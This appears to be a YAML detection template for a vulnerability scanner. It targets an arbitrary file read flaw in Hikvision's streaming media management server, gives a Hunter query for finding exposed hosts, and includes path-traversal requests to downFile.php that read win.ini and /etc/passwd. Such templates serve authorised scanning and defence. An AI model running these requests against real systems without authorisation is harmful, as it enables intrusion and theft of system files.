漏洞描述
Hunter: web.title="流媒体管理服务器"
id: hikvision-downfle-fileread
info:
name: 海康威视流媒体管理服务器后台任意文件读取漏洞
author: zan8in
severity: high
verified: true
description: |-
Hunter: web.title="流媒体管理服务器"
reference:
- https://mp.weixin.qq.com/s/khra2Z6U57kktxGooUEu-A
tags: hikvision,fileread
created: 2024/01/06
rules:
r0:
request:
method: GET
path: /systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/win.ini
expression: response.status == 200 && response.body.bcontains(b'bit app support')
r1:
request:
method: GET
path: /systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() || r1()